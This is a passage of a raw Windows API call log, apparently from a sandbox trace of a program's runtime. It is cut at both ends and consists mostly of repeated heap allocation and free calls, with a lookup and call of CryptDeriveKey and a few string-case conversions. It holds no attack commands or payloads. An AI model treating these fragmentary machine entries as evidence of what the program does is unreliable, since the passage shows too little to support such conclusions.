dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0200.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24aa068, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0200.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.375] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0200.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0200.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0200.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.376] CryptDeriveKey (in: hProv=0xad63f8, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0200.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0200.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.380] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.384] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.384] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.385] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.385] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.385] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 